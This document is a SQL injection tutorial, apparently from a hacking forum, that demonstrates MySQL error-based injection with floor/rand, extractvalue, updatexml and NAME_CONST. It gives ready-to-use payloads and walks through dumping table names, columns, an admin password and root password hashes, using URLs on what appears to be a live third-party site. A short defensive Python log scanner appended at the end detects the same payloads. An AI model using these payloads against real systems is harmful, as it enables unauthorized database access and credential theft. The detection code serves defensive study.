1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the version() expression with the query you want to run.

For example, to retrieve the administrator username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error:Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error:Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error:Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error:Duplicate column name '1

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error:Duplicate column name 'com_admanage

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error:Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error:Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
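The four error-based primitives collected on this page (floor(rand(0)*2) with GROUP BY, extractvalue, updatexml and NAME_CONST) have recognizable shapes in the request, and each leaves an equally recognizable MySQL error fragment in the response. The following is an added example, not part of the original post, showing one way a defender can flag both in web logs; the tab-separated log format and the sample lines are constructed for the example, and the payloads in them are the ones quoted on this page.

```python
import re
from urllib.parse import unquote_plus

# Error-based primitives from this page, matched on the decoded, lowercased query string.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)")
GROUP_BY = re.compile(r"group\s+by")
ERR_FUNCS = re.compile(r"\b(extractvalue|updatexml|name_const)\s*\(")
# MySQL error fragments the page shows reaching the HTTP response body.
LEAK_MARKERS = ("Duplicate entry", "XPATH syntax error", "Duplicate column name")

def normalize(query_string):
    """Decode '+' and %xx twice (one level of double encoding), collapse whitespace, lowercase."""
    decoded = unquote_plus(unquote_plus(query_string))
    return re.sub(r"\s+", " ", decoded).lower()

def classify_request(query_string):
    """Return the error-based primitives present in one request's query string."""
    q = normalize(query_string)
    found = ["floor_rand_groupby"] if FLOOR_RAND.search(q) and GROUP_BY.search(q) else []
    return found + sorted(set(ERR_FUNCS.findall(q)))

def leaked_error(response_excerpt):
    """Return the first MySQL error marker found in a response excerpt, else None."""
    return next((m for m in LEAK_MARKERS if m in response_excerpt), None)

def scan(log_lines):
    """Lines are tab-separated query, status, response excerpt; return those worth alerting on."""
    alerts = []
    for n, line in enumerate(log_lines, 1):
        query, status, excerpt = line.split("\t", 2)
        prims, leak = classify_request(query), leaked_error(excerpt)
        if prims or leak:  # a leak with no known primitive is still a verbose-error finding
            alerts.append({"line": n, "status": int(status), "primitives": prims, "leak": leak})
    return alerts

# Constructed sample log lines (query string, HTTP status, response excerpt).
SAMPLE_LOG = [
    "id=330&sid=19&cid=261\t200\t<div class=content>...</div>",
    "id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a)\t500\tERROR 1062 (23000): Duplicate entry",
    "id=1+and+extractvalue(1,concat(0x5c,(select+table_name+from+information_schema.tables+limit+1)))"
    "\t500\tERROR 1105 (HY000): XPATH syntax error",
    "id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--"
    "\t500\tError:Duplicate column name",
]
```

Only the status and the error marker are needed to catch the verbose-error misconfiguration itself; the primitive match tells you which of the page's techniques the request is shaped like.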